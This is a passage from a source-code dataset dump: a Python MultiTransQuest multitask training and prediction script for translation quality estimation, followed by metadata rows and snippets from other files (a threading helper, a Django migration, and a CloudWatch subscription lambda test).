df_test_bad = df_test_bad.rename(columns={"shuffled_text_a": "text_a"})
df_test_bad['labels'] = np.zeros(len(test)).astype(int)
df_test_bad = df_test_bad[500:]
test = pd.concat((df_test_good, df_test_bad), ignore_index=True)
test = test.sample(frac=1, random_state=1)
test['index'] = np.arange(0, len(test))
# Create test sentence pairs in the expected format
test_sentence_pairs = list(map(list, zip(test['text_a'].to_list(), test['text_b'].to_list())))
# Store dataframes and test sentence pairs
train_dataframes.append(train)
dev_dataframes.append(dev)
test_dataframes.append(test)
list_test_sentence_pairs.append(test_sentence_pairs)
data = [train_dataframes, dev_dataframes, test_dataframes, list_test_sentence_pairs]
test_preds_per_task, dev_preds_per_task = train_MultiTransQuest(data, language, wandb_group,
n_heads=len(train_dataframes))
else:
train_dataframes = []
dev_dataframes = []
test_dataframes = []
list_test_sentence_pairs = []
data = ['MLQE', 'MLQE_shuffle']
for dataset in data:
train, dev, test = load_MLQE_data(language=language, label='DA', prep_for_training=True)
if dataset == 'MLQE_shuffle':
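# Auxiliary binary task: original sentence pairs are labelled 1, pairs with a shuffled source sentence are labelled 0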
train["shuffled_text_a"] = train["text_a"].sample(frac=1, random_state=1).values
df_train_good = train[['text_a', 'text_b']].copy()
df_train_good['labels'] = np.ones(len(train)).astype(int)
df_train_good = df_train_good[:3500]
df_train_bad = train[['shuffled_text_a', 'text_b']].copy()
df_train_bad['labels'] = np.zeros(len(train)).astype(int)
df_train_bad = df_train_bad.rename(columns={"shuffled_text_a": "text_a"})
df_train_bad = df_train_bad[3500:]
train = pd.concat((df_train_good, df_train_bad), ignore_index=True)
train = train.sample(frac=1, random_state=1)
dev["shuffled_text_a"] = dev["text_a"].sample(frac=1, random_state=1).values
df_dev_good = dev[['text_a', 'text_b']].copy()
df_dev_good['labels'] = np.ones(len(dev)).astype(int)
df_dev_good = df_dev_good[:500]
df_dev_bad = dev[['shuffled_text_a', 'text_b']].copy()
df_dev_bad = df_dev_bad.rename(columns={"shuffled_text_a": "text_a"})
df_dev_bad['labels'] = np.zeros(len(dev)).astype(int)
df_dev_bad = df_dev_bad[500:]
dev = pd.concat((df_dev_good, df_dev_bad), ignore_index=True)
dev = dev.sample(frac=1, random_state=1)
test["shuffled_text_a"] = test["text_a"].sample(frac=1, random_state=1).values
df_test_good = test[['text_a', 'text_b']].copy()
df_test_good['labels'] = np.ones(len(test)).astype(int)
df_test_good = df_test_good[:500]
df_test_bad = test[['shuffled_text_a', 'text_b']].copy()
df_test_bad = df_test_bad.rename(columns={"shuffled_text_a": "text_a"})
df_test_bad['labels'] = np.zeros(len(test)).astype(int)
df_test_bad = df_test_bad[500:]
test = pd.concat((df_test_good, df_test_bad), ignore_index=True)
test = test.sample(frac=1, random_state=1)
test['index'] = np.arange(0, len(test))
# Create test sentence pairs in the expected format
test_sentence_pairs = list(map(list, zip(test['text_a'].to_list(), test['text_b'].to_list())))
# Store dataframes and test sentence pairs
train_dataframes.append(train)
dev_dataframes.append(dev)
test_dataframes.append(test)
list_test_sentence_pairs.append(test_sentence_pairs)
data = [train_dataframes, dev_dataframes, test_dataframes, list_test_sentence_pairs]
test_preds_per_task, dev_preds_per_task = train_MultiTransQuest(data, language, wandb_group,
n_heads=len(train_dataframes), **kwargs)
return test_preds_per_task, dev_preds_per_task
def multitask_partial_input(language="EN-DE", label="DA", wandb_group="adv_partial_input", is_sweeping=False, **kwargs):
if is_sweeping:
with wandb.init(group=wandb_group) as run:
sweep_config = wandb.config
print('CONFIG', wandb.config)
train_dataframes = []
dev_dataframes = []
test_dataframes = []
list_test_sentence_pairs = []
language = sweep_config['language']
label = sweep_config['label']
assert label in ['DA', 'HTER']
partial_inputs = ['both', 'target']
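# Train one head on full sentence pairs ('both') and an adversarial head that only sees the target side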
for partial_input in partial_inputs:
# Load train, dev and test data with the corresponding label
train, dev, test = load_MLQE_data(language=language, label=label, prep_for_training=True)
if partial_input == 'source':
train = train.drop('text_b', axis=1)
train = train.rename(columns={"text_a": "text"})
dev = dev.drop('text_b', axis=1)
dev = dev.rename(columns={"text_a": "text"})
test = test.drop('text_b', axis=1)
test = test.rename(columns={"text_a": "text"})
test_sentence_pairs = test['text'].to_list()
elif partial_input == 'target':
train = train.drop('text_a', axis=1)
train = train.rename(columns={"text_b": "text"})
dev = dev.drop('text_a', axis=1)
dev = dev.rename(columns={"text_b": "text"})
test = test.drop('text_a', axis=1)
test = test.rename(columns={"text_b": "text"})
test_sentence_pairs = test['text'].to_list()
else:
test_sentence_pairs = list(map(list, zip(test['text_a'].to_list(), test['text_b'].to_list())))
# Store dataframes and test sentence pairs
train_dataframes.append(train)
dev_dataframes.append(dev)
test_dataframes.append(test)
list_test_sentence_pairs.append(test_sentence_pairs)
data = [train_dataframes, dev_dataframes, test_dataframes, list_test_sentence_pairs]
test_preds_per_task, dev_preds_per_task = train_MultiTransQuest(data, language, wandb_group,
n_heads=len(train_dataframes),
sweep_config=sweep_config)
else:
train_dataframes = []
dev_dataframes = []
test_dataframes = []
list_test_sentence_pairs = []
assert label in ['DA', 'HTER']
partial_inputs = ['both', 'target']
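# Train one head on full sentence pairs ('both') and an adversarial head that only sees the target side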
for partial_input in partial_inputs:
# Load train, dev and test data with the corresponding label
train, dev, test = load_MLQE_data(language=language, label=label, prep_for_training=True)
if partial_input == 'source':
train = train.drop('text_b', axis=1)
train = train.rename(columns={"text_a": "text"})
dev = dev.drop('text_b', axis=1)
dev = dev.rename(columns={"text_a": "text"})
test = test.drop('text_b', axis=1)
test = test.rename(columns={"text_a": "text"})
test_sentence_pairs = test['text'].to_list()
elif partial_input == 'target':
train = train.drop('text_a', axis=1)
train = train.rename(columns={"text_b": "text"})
dev = dev.drop('text_a', axis=1)
dev = dev.rename(columns={"text_b": "text"})
test = test.drop('text_a', axis=1)
test = test.rename(columns={"text_b": "text"})
test_sentence_pairs = test['text'].to_list()
else:
test_sentence_pairs = list(map(list, zip(test['text_a'].to_list(), test['text_b'].to_list())))
# Store dataframes and test sentence pairs
train_dataframes.append(train)
dev_dataframes.append(dev)
test_dataframes.append(test)
list_test_sentence_pairs.append(test_sentence_pairs)
data = [train_dataframes, dev_dataframes, test_dataframes, list_test_sentence_pairs]
test_preds_per_task, dev_preds_per_task = train_MultiTransQuest(data, language,
n_heads=len(train_dataframes), **kwargs)
return test_preds_per_task, dev_preds_per_task
def multitask_sentence_length(language='EN-DE', label="DA", sentence_length_input='text_a', wandb_group="adv-sentence-length",
is_sweeping=False, **kwargs):
if is_sweeping:
with wandb.init(group=wandb_group) as run:
sweep_config = wandb.config
print('CONFIG', wandb.config)
language = sweep_config['language']
label = sweep_config['label']
sentence_length_input = sweep_config['sentence_length_input']
config_defaults = multitransquest_config
run.config.setdefaults(config_defaults)
print(wandb_group)
print('CONFIG', wandb.config)
train_dataframes = []
dev_dataframes = []
test_dataframes = []
list_test_sentence_pairs = []
assert label in ['DA', 'HTER']
assert sentence_length_input in ['text_a', 'text_b']
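# The second head uses the token count of the chosen column as an auxiliary regression label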
for use_sentence_length in [False, True]:
# Load train, dev and test data with the corresponding label
train, dev, test = load_MLQE_data(language=language, label=label, prep_for_training=True)
if use_sentence_length:
train['labels'] = train[sentence_length_input].str.split().str.len()
dev['labels'] = dev[sentence_length_input].str.split().str.len()
test['labels'] = test[sentence_length_input].str.split().str.len()
test_sentence_pairs = list(map(list, zip(test['text_a'].to_list(), test['text_b'].to_list())))
# Store dataframes and test sentence pairs
train_dataframes.append(train)
dev_dataframes.append(dev)
test_dataframes.append(test)
list_test_sentence_pairs.append(test_sentence_pairs)
data = [train_dataframes, dev_dataframes, test_dataframes, list_test_sentence_pairs]
test_preds_per_task, dev_preds_per_task = train_MultiTransQuest(data, language, wandb_group,
n_heads=len(train_dataframes),
sweep_config=sweep_config)
else:
train_dataframes = []
dev_dataframes = []
test_dataframes = []
list_test_sentence_pairs = []
assert label in ['DA', 'HTER']
assert sentence_length_input in ['text_a', 'text_b']
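# The second head uses the token count of the chosen column as an auxiliary regression label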
for use_sentence_length in [False, True]:
# Load train, dev and test data with the corresponding label
train, dev, test = load_MLQE_data(language=language, label=label, prep_for_training=True)
if use_sentence_length:
train['labels'] = train[sentence_length_input].str.split().str.len()
dev['labels'] = dev[sentence_length_input].str.split().str.len()
test['labels'] = test[sentence_length_input].str.split().str.len()
test_sentence_pairs = list(map(list, zip(test['text_a'].to_list(), test['text_b'].to_list())))
# Store dataframes and test sentence pairs
train_dataframes.append(train)
dev_dataframes.append(dev)
test_dataframes.append(test)
list_test_sentence_pairs.append(test_sentence_pairs)
data = [train_dataframes, dev_dataframes, test_dataframes, list_test_sentence_pairs]
test_preds_per_task, dev_preds_per_task = train_MultiTransQuest(data, language,
n_heads=len(train_dataframes), **kwargs)
return test_preds_per_task, dev_preds_per_task
# Inference: Using the trained model for predictions
def predict_MultiTransQuest(model_language='EN-DE', language="EN-DE", evaluation_type="DA", save_results=True, dataset="test", data='MLQE', task_number=0, task="regression", aux_type="multilanguage", experiment='', partial_input=None, shuffle_column=None, **kwargs):
if "task_config" in kwargs:
task_config = kwargs.get("task_config")
multitransquest_config.update(task_config)
if data == 'wikimatrix':
if model_language == 'EN-DE':
file = "ende_9000_aug_custom_pipeline.tsv"
#elif model_language == 'EN-ZH':
# file = "enzh_9000_aug_custom_pipeline.tsv"
else:
print('Please specify WikiMatrix data file')
train, dev, test = load_WikiMatrix_data(file=file, language=language, prep_for_training=True)
else:
if evaluation_type == 'DA':
train, dev, test = load_MLQE_data(language=language, label='DA', prep_for_training=True)
else:
train, dev, test = load_MLQE_data(language=language, label='HTER', prep_for_training=True)
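# Build the inputs for the requested split, optionally dropping one side (partial input) or shuffling a column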
if dataset == 'test':
reference = test
if partial_input == "target":
test = test.drop('text_a', axis=1)
test = test.rename(columns={"text_b": "text"})
test_sentence_pairs = test['text'].to_list()
elif partial_input == "source":
test = test.drop('text_b', axis=1)
test = test.rename(columns={"text_a": "text"})
test_sentence_pairs = test['text'].to_list()
else:
if shuffle_column is not None:
assert shuffle_column in ['text_a', 'text_b']
test = swap_sentence_pairs(test, shuffle_column=shuffle_column)
test_sentence_pairs = list(map(list, zip(test['text_a'].to_list(), test['text_b'].to_list())))
elif dataset == 'dev':
reference = dev
if partial_input == "target":
dev = dev.drop('text_a', axis=1)
dev = dev.rename(columns={"text_b": "text"})
test_sentence_pairs = dev['text'].to_list()
elif partial_input == "source":
dev = dev.drop('text_b', axis=1)
dev = dev.rename(columns={"text_a": "text"})
test_sentence_pairs = dev['text'].to_list()
else:
if shuffle_column is not None:
assert shuffle_column in ['text_a', 'text_b']
dev = swap_sentence_pairs(dev, shuffle_column=shuffle_column)
test_sentence_pairs = list(map(list, zip(dev['text_a'].to_list(), dev['text_b'].to_list())))
else:
print('Please specify the dataset used for predictions (either dev or test)')
model = MultiTransQuestModel(MODEL_TYPE, multitransquest_config["best_model_dir"],
use_cuda=torch.cuda.is_available(), wandb_group="aug_data_multitask",
args=multitransquest_config, **kwargs)
predictions, raw_outputs = model.predict(test_sentence_pairs, curr_task=task_number)
if data == 'wikimatrix':
df_pred = pd.DataFrame(predictions, columns=['prediction'])
else:
df_pred = pd.DataFrame(predictions, columns=['Predicted_' + evaluation_type])
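# Persist predictions; the output path encodes auxiliary task type, experiment, split, and (for FINAL runs) the seed, with out-of-domain runs written to separate OOD files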
if save_results:
if experiment == "FINAL":
seed = task_config['manual_seed']
print("Seed:",seed)
if language == model_language:
if partial_input == "source":
df_pred.to_csv(
'DATA/MLQE-PE/' + model_language + '/predictions/multitask/' + aux_type + '/' + experiment + '/' + dataset + '_data/' + str(seed) + '_pred_' + dataset + '_' + evaluation_type + '_multi_partial_source.csv')
elif partial_input == "target":
df_pred.to_csv(
'DATA/MLQE-PE/' + model_language + '/predictions/multitask/' + aux_type + '/' + experiment + '/' + dataset + '_data/' + str(seed) + '_pred_' + dataset + '_' + evaluation_type + '_multi_partial_target.csv')
elif shuffle_column == "text_a":
df_pred.to_csv(
'DATA/MLQE-PE/' + model_language + '/predictions/multitask/' + aux_type + '/' + experiment + '/' + dataset + '_data/' + str(seed) + '_pred_' + dataset + '_' + evaluation_type + '_multi_shuffle_source.csv')
elif shuffle_column == "text_b":
df_pred.to_csv(
'DATA/MLQE-PE/' + model_language + '/predictions/multitask/' + aux_type + '/' + experiment + '/' + dataset + '_data/' + str(seed) + '_pred_' + dataset + '_' + evaluation_type + '_multi_shuffle_target.csv')
else:
df_pred.to_csv(
'DATA/MLQE-PE/' + model_language + '/predictions/multitask/' + aux_type + '/' + experiment + '/' + dataset + '_data/' + str(seed) + '_pred_' + dataset + '_' + evaluation_type + '_multi.csv')
# Out of domain predictions
else:
if partial_input == "source":
df_pred.to_csv(
'DATA/MLQE-PE/' + model_language + '/predictions/multitask/' + aux_type + '/' + experiment + '/' + str(seed) + '_' + dataset + '_data/OOD_' + language + '_pred_' + dataset + '_' + evaluation_type + '_multi_partial_source.csv')
elif partial_input == "target":
df_pred.to_csv(
'DATA/MLQE-PE/' + model_language + '/predictions/multitask/' + aux_type + '/' + experiment + '/' + str(seed) + '_' + dataset + '_data/OOD_' + language + '_pred_' + dataset + '_' + evaluation_type + '_multi_partial_target.csv')
elif shuffle_column == "text_a":
df_pred.to_csv(
'DATA/MLQE-PE/' + model_language + '/predictions/multitask/' + aux_type + '/' + experiment + '/' + str(seed) + '_' + dataset + '_data/OOD_' + language + '_pred_' + dataset + '_' + evaluation_type + '_multi_shuffle_source.csv')
elif shuffle_column == "text_b":
df_pred.to_csv(
'DATA/MLQE-PE/' + model_language + '/predictions/multitask/' + aux_type + '/' + experiment + '/' + str(seed) + '_' + dataset + '_data/OOD_' + language + '_pred_' + dataset + '_' + evaluation_type + '_multi_shuffle_target.csv')
else:
df_pred.to_csv(
'DATA/MLQE-PE/' + model_language + '/predictions/multitask/' + aux_type + '/' + experiment + '/'+ str(seed) + '_' + dataset + '_data/OOD_' + language + '_pred_' + dataset + '_' + evaluation_type + '_multi.csv')
else:
if language == model_language:
if partial_input == "source":
df_pred.to_csv(
'DATA/MLQE-PE/' + model_language + '/predictions/multitask/'+aux_type+'/' +experiment+'/' + dataset + '_data/pred_' + dataset + '_' + evaluation_type + '_multi_partial_source.csv')
elif partial_input == "target":
df_pred.to_csv(
'DATA/MLQE-PE/' + model_language + '/predictions/multitask/'+aux_type+'/' +experiment+'/' + dataset + '_data/pred_' + dataset + '_' + evaluation_type + '_multi_partial_target.csv')
elif shuffle_column == "text_a":
df_pred.to_csv(
'DATA/MLQE-PE/' + model_language + '/predictions/multitask/'+aux_type+'/' +experiment+'/' + dataset + '_data/pred_' + dataset + '_' + evaluation_type + '_multi_shuffle_source.csv')
elif shuffle_column == "text_b":
df_pred.to_csv(
'DATA/MLQE-PE/' + model_language + '/predictions/multitask/'+aux_type+'/' +experiment+'/' + dataset + '_data/pred_' + dataset + '_' + evaluation_type + '_multi_shuffle_target.csv')
else:
df_pred.to_csv(
'DATA/MLQE-PE/' + model_language + '/predictions/multitask/'+aux_type+'/' +experiment+'/' + dataset + '_data/pred_' + dataset + '_' + evaluation_type + '_multi.csv')
# Out of domain predictions
else:
if partial_input == "source":
df_pred.to_csv(
'DATA/MLQE-PE/' + model_language + '/predictions/multitask/'+aux_type+'/' +experiment+'/' + dataset + '_data/OOD_' + language + '_pred_' + dataset + '_' + evaluation_type + '_multi_partial_source.csv')
elif partial_input == "target":
df_pred.to_csv(
'DATA/MLQE-PE/' + model_language + '/predictions/multitask/'+aux_type+'/' +experiment+'/' + dataset + '_data/OOD_' + language + '_pred_' + dataset + '_' + evaluation_type + '_multi_partial_target.csv')
elif shuffle_column == "text_a":
df_pred.to_csv(
'DATA/MLQE-PE/' + model_language + '/predictions/multitask/'+aux_type+'/' +experiment+'/' + dataset + '_data/OOD_' + language + '_pred_' + dataset + '_' + evaluation_type + '_multi_shuffle_source.csv')
elif shuffle_column == "text_b":
df_pred.to_csv(
'DATA/MLQE-PE/' + model_language + '/predictions/multitask/'+aux_type+'/' +experiment+'/' + dataset + '_data/OOD_' + language + '_pred_' + dataset + '_' + evaluation_type + '_multi_shuffle_target.csv')
else:
df_pred.to_csv(
'DATA/MLQE-PE/' + model_language + '/predictions/multitask/'+aux_type+'/' +experiment+'/' + dataset + '_data/OOD_' + language + '_pred_' + dataset + '_' + evaluation_type + '_multi.csv')
return df_pred, reference
def main():
sweep_id = wandb.sweep(sweep=SWEEP_CONFIG, project="multi-transquest")
wandb.agent(sweep_id, function=multitask_augmented_wiki_data, count=20)
model_language = "EN-DE"
label = "DA"
languages = ['EN-DE', 'EN-ZH', 'RO-EN', 'ET-EN', 'SI-EN', 'NE-EN', 'RU-EN']
val_sets = ["test", "dev"]
for val_set in val_sets:
for val_language in languages:
# Out of domain predictions
if model_language != val_language:
predict_MultiTransQuest(language=val_language, model_language=model_language, dataset=val_set, aux_type="aug",
evaluation_type=label, data='MLQE', task='regression', partial_input=False)
if val_language == model_language:
# Predict on both sentences
predict_MultiTransQuest(language=val_language, model_language=model_language, dataset=val_set, aux_type="aug",
evaluation_type=label, data='MLQE', task='regression')
# Predict on partial input and shuffled datasets
predict_MultiTransQuest(language=val_language, model_language=model_language, dataset=val_set, aux_type="aug",
evaluation_type=label, data='MLQE', task='regression', partial_input="source", )
predict_MultiTransQuest(language=val_language, model_language=model_language, dataset=val_set, aux_type="aug",
evaluation_type=label, data='MLQE', task='regression', partial_input="target")
predict_MultiTransQuest(language=val_language, model_language=model_language, dataset=val_set, aux_type="aug",
evaluation_type=label, data='MLQE', task='regression', shuffle_column="text_a")
predict_MultiTransQuest(language=val_language, model_language=model_language, dataset=val_set, aux_type="aug",
evaluation_type=label, data='MLQE', task='regression', shuffle_column="text_b")
if __name__ == "__main__":
main()
| 50.259101
| 266
| 0.587427
| 5,241
| 46,942
| 4.931311
| 0.058004
| 0.049294
| 0.062488
| 0.032501
| 0.847321
| 0.830064
| 0.816019
| 0.79822
| 0.787618
| 0.783285
| 0
| 0.004013
| 0.304653
| 46,942
| 933
| 267
| 50.312969
| 0.787782
| 0.039581
| 0
| 0.763081
| 0
| 0
| 0.102023
| 0.0262
| 0
| 0
| 0
| 0
| 0.013081
| 1
| 0.013081
| false
| 0
| 0.047965
| 0
| 0.072674
| 0.03343
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
d1d038b3c27b15a35458be16ee758e0b16121b66
| 118
|
py
|
Python
|
src/opera/threading/utils.py
|
Legion2/xopera-opera
|
808f23cbac326b6d067e6ec531a0109ae02d0f5e
|
[
"Apache-2.0"
] | null | null | null |
src/opera/threading/utils.py
|
Legion2/xopera-opera
|
808f23cbac326b6d067e6ec531a0109ae02d0f5e
|
[
"Apache-2.0"
] | null | null | null |
src/opera/threading/utils.py
|
Legion2/xopera-opera
|
808f23cbac326b6d067e6ec531a0109ae02d0f5e
|
[
"Apache-2.0"
] | null | null | null |
from threading import current_thread
def print_thread(message):
print("[{}] {}".format(current_thread().name, message))
| 19.666667
| 55
| 0.70339
| 15
| 118
| 5.333333
| 0.666667
| 0.325
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.127119
| 118
| 5
| 56
| 23.6
| 0.776699
| 0
| 0
| 0
| 0
| 0
| 0.059322
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.333333
| false
| 0
| 0.333333
| 0
| 0.666667
| 0.666667
| 1
| 0
| 0
| null | 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 1
| 0
| 1
| 1
|
0
| 7
|
d1dc6c49f1963433fcaef822a68e321440aec237
| 4,459
|
py
|
Python
|
django_app/migrations/0013_auto_20201110_1850.py
|
jorgeassis/darwinCoreGUI
|
3cfd1752acb77fd56ad4511d9e1a83bc86252449
|
[
"CC0-1.0"
] | null | null | null |
django_app/migrations/0013_auto_20201110_1850.py
|
jorgeassis/darwinCoreGUI
|
3cfd1752acb77fd56ad4511d9e1a83bc86252449
|
[
"CC0-1.0"
] | null | null | null |
django_app/migrations/0013_auto_20201110_1850.py
|
jorgeassis/darwinCoreGUI
|
3cfd1752acb77fd56ad4511d9e1a83bc86252449
|
[
"CC0-1.0"
] | null | null | null |
# Generated by Django 3.1.3 on 2020-11-10 18:50
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
('django_app', '0012_auto_20201110_1848'),
]
operations = [
migrations.AlterField(
model_name='biodiversityrecords',
name='SampleN',
field=models.FloatField(blank=True, null=True),
),
migrations.AlterField(
model_name='biodiversityrecords',
name='bibliographicCitation',
field=models.TextField(blank=True, null=True),
),
migrations.AlterField(
model_name='biodiversityrecords',
name='coordinateUncertaintyInMeters',
field=models.FloatField(blank=True, null=True),
),
migrations.AlterField(
model_name='biodiversityrecords',
name='day',
field=models.IntegerField(blank=True, null=True),
),
migrations.AlterField(
model_name='biodiversityrecords',
name='decimalLatitude',
field=models.FloatField(blank=True, null=True),
),
migrations.AlterField(
model_name='biodiversityrecords',
name='decimalLongitude',
field=models.FloatField(blank=True, null=True),
),
migrations.AlterField(
model_name='biodiversityrecords',
name='fieldNotes',
field=models.TextField(blank=True, null=True),
),
migrations.AlterField(
model_name='biodiversityrecords',
name='georeferenceRemarks',
field=models.TextField(blank=True, null=True),
),
migrations.AlterField(
model_name='biodiversityrecords',
name='identificationRemarks',
field=models.TextField(blank=True, null=True),
),
migrations.AlterField(
model_name='biodiversityrecords',
name='individualCount',
field=models.FloatField(blank=True, null=True),
),
migrations.AlterField(
model_name='biodiversityrecords',
name='license',
field=models.TextField(blank=True, null=True),
),
migrations.AlterField(
model_name='biodiversityrecords',
name='maximumDepthInMeters',
field=models.FloatField(blank=True, null=True),
),
migrations.AlterField(
model_name='biodiversityrecords',
name='measurementRemarks',
field=models.TextField(blank=True, null=True),
),
migrations.AlterField(
model_name='biodiversityrecords',
name='measurementValue',
field=models.FloatField(blank=True, null=True),
),
migrations.AlterField(
model_name='biodiversityrecords',
name='minimumDepthInMeters',
field=models.FloatField(blank=True, null=True),
),
migrations.AlterField(
model_name='biodiversityrecords',
name='month',
field=models.IntegerField(blank=True, null=True),
),
migrations.AlterField(
model_name='biodiversityrecords',
name='namePublishedInYear',
field=models.IntegerField(blank=True, null=True),
),
migrations.AlterField(
model_name='biodiversityrecords',
name='organismQuantity',
field=models.FloatField(blank=True, null=True),
),
migrations.AlterField(
model_name='biodiversityrecords',
name='recordNumber',
field=models.IntegerField(blank=True, null=True),
),
migrations.AlterField(
model_name='biodiversityrecords',
name='sampleSizeValue',
field=models.FloatField(blank=True, null=True),
),
migrations.AlterField(
model_name='biodiversityrecords',
name='taxonRemarks',
field=models.TextField(blank=True, null=True),
),
migrations.AlterField(
model_name='biodiversityrecords',
name='verbatimDepth',
field=models.FloatField(blank=True, null=True),
),
migrations.AlterField(
model_name='biodiversityrecords',
name='year',
field=models.IntegerField(blank=True, null=True),
),
]
| 34.565891
| 61
| 0.579726
| 352
| 4,459
| 7.267045
| 0.167614
| 0.179828
| 0.224785
| 0.260751
| 0.810399
| 0.810399
| 0.79007
| 0.774433
| 0.774433
| 0.774433
| 0
| 0.010094
| 0.311281
| 4,459
| 128
| 62
| 34.835938
| 0.822859
| 0.010092
| 0
| 0.754098
| 1
| 0
| 0.182004
| 0.021306
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0.008197
| 0
| 0.032787
| 0
| 0
| 0
| 0
| null | 0
| 1
| 1
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 1
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 10
|
ae819ed07b666ee5dcbef5bf44de7596ef8cd5b7
| 3,082
|
py
|
Python
|
tests/test_cloudwatch_subscription_lambda.py
|
binxio/blog-cloudwatch-subscription-elasticsearch-lambda
|
f068a45c4d11df120bbe06d39674ec58d5697de8
|
[
"Apache-2.0"
] | 1
|
2021-06-05T16:19:23.000Z
|
2021-06-05T16:19:23.000Z
|
tests/test_cloudwatch_subscription_lambda.py
|
binxio/blog-cloudwatch-subscription-elasticsearch-lambda
|
f068a45c4d11df120bbe06d39674ec58d5697de8
|
[
"Apache-2.0"
] | null | null | null |
tests/test_cloudwatch_subscription_lambda.py
|
binxio/blog-cloudwatch-subscription-elasticsearch-lambda
|
f068a45c4d11df120bbe06d39674ec58d5697de8
|
[
"Apache-2.0"
] | null | null | null |
from lambdas.cloudwatch_subscription_lambda import *
import json
def event() -> dict:
return {
"awslogs": {"data": "H4sIAAAAAAAAAKVSXXPaMBD8Kx5PH1GQZNmS/AbFSchXKZA2kzjTEdZBPGMw9UdIyvDfe8ZJylObTp5s3+7d7Xpv6y6hLM0Cps9rcEN30Jv2flxGk0nvJHI7br5ZQYHlgHGhPM1FICmWs3xxUuT1GpGu2ZTdzCxn1nSTLK/txlTJAynrWZkU6bpK8xWBzJRVmpRgyLRIFwsojutVsofYcHxyxs5u5Oj8dfKkKsAscTSnTHUZ63LWvft00ZtGk+m9J40E61MFcyM8I1QiZAAQJB7XCozEEYerj9OsgqJ0wzv33+IKhODJLNcZkAP25+b1e/N6geIOW9loGHnSOxsMb0+v3fu9+ugRVlWzcOumFk14QlCfak0lo55kzOe+DDwZcBroQHhSUOEprZCklAi40AyxQCk0UqWYTYV63JD5gksptdZS8c5rZjh+G7uPaBDVxG7oxC6N3Q4+Utt+Btr6CnxDmA04SYApMrcyIVxQPTN85gkj2g4LlUkzUuEZtK2T5AFsnYF19pZaVpnXRfJCwOCPYO+2xUyS5HVD3C8+OJgWbty0WJMrYYxwNqV+yIOQs9uWU8DizQnUZIP2CXuF2t1lg97htmIVooKwVRC+scPDzWGBBv5+lgfxttGNsQXVfft6Or4Zj/rReT/GaN/+ULN+u9vFK3fX+VjE+p0RR1cDZww/ayQObehQP0Fv1BKwohEKiui5nhM1t3PLMFRr2MfVafpOdeNo9GU8/W+B1aAuTJMC8o884SzLuOqnWXNufxBGKQJOXF3CMi+enUn6C7DKlXPZx6J5cl6A6xJwMWf7emP+fvcbIoYHFtkEAAA="}}
def log_line() -> str:
return "{\"version\": \"0\", \"id\": \"7fceb3f1-f0f7-3529-09dc-5b10edf9cb2b\", \"detail-type\": \"Scheduled Event\", \"source\": \"aws.events\", \"account\": \"612483924670\", \"time\": \"2018-11-21T05:24:21Z\", \"region\": \"eu-west-1\", \"resources\": [\"arn:aws:events:eu-west-1:612483924670:rule/cloudwatch-subscription-elast-CloudWatchEventsRule-11VQHRXRPBEKB\"], \"detail\": {}}\n"
def test_decode_event():
assert decode_event(event()) == {'messageType': 'DATA_MESSAGE', 'owner': '612483924670', 'logGroup': '/aws/lambda/cloudwatch-subscription-elasticsea-TriggerFunction-1IRGJ1JX7PK70', 'logStream': '2018/11/21/[$LATEST]37a7ed508efa43a48c476ee6c3298ea7', 'subscriptionFilters': ['cloudwatch-subscription-elasticsearch-example-cloudwatch-CloudWatchLogSubscription-1PIE373JDIZHU'], 'logEvents': [{'id': '34405099071037115257637620696437404389840588462491762688', 'timestamp': 1542777999782, 'message': '{"version": "0", "id": "69d58e5a-1d62-ce18-fd7c-2409ba2b34a4", "detail-type": "Scheduled Event", "source": "aws.events", "account": "612483924670", "time": "2018-11-21T05:26:21Z", "region": "eu-west-1", "resources": ["arn:aws:events:eu-west-1:612483924670:rule/cloudwatch-subscription-elast-CloudWatchEventsRule-11VQHRXRPBEKB"], "detail": {}}\n'}, {'id': '34405099071037115257637620696437404389840588462491762689', 'timestamp': 1542777999782, 'message': 'END RequestId: 05c2460d-ed4e-11e8-9f9f-8fdfd1ba2da1\n'}, {'id': '34405099071037115257637620696437404389840588462491762690', 'timestamp': 1542777999782, 'message': 'REPORT RequestId: 05c2460d-ed4e-11e8-9f9f-8fdfd1ba2da1\tDuration: 0.34 ms\tBilled Duration: 100 ms \tMemory Size: 128 MB\tMax Memory Used: 21 MB\t\n'}]}
def test_load_log_line():
assert json.loads(log_line()) == {'version': '0', 'id': '7fceb3f1-f0f7-3529-09dc-5b10edf9cb2b', 'detail-type': 'Scheduled Event', 'source': 'aws.events', 'account': '612483924670', 'time': '2018-11-21T05:24:21Z', 'region': 'eu-west-1', 'resources': ['arn:aws:events:eu-west-1:612483924670:rule/cloudwatch-subscription-elast-CloudWatchEventsRule-11VQHRXRPBEKB'], 'detail': {}}
| 192.625
| 1,271
| 0.791045
| 272
| 3,082
| 8.922794
| 0.492647
| 0.054388
| 0.017305
| 0.029666
| 0.316852
| 0.316852
| 0.283066
| 0.283066
| 0.283066
| 0.283066
| 0
| 0.205742
| 0.050616
| 3,082
| 15
| 1,272
| 205.466667
| 0.623718
| 0
| 0
| 0
| 0
| 0.363636
| 0.728748
| 0.527579
| 0
| 0
| 0
| 0
| 0.181818
| 1
| 0.363636
| true
| 0
| 0.181818
| 0.181818
| 0.727273
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 1
| 1
| 1
| null | 0
| 0
| 0
| 0
| 0
| 1
| 1
| 0
| 0
| 1
| 1
| 0
|
0
| 10
|
88181c9a6fd627934ecb3115109b3ce13ed61353
| 371
|
py
|
Python
|
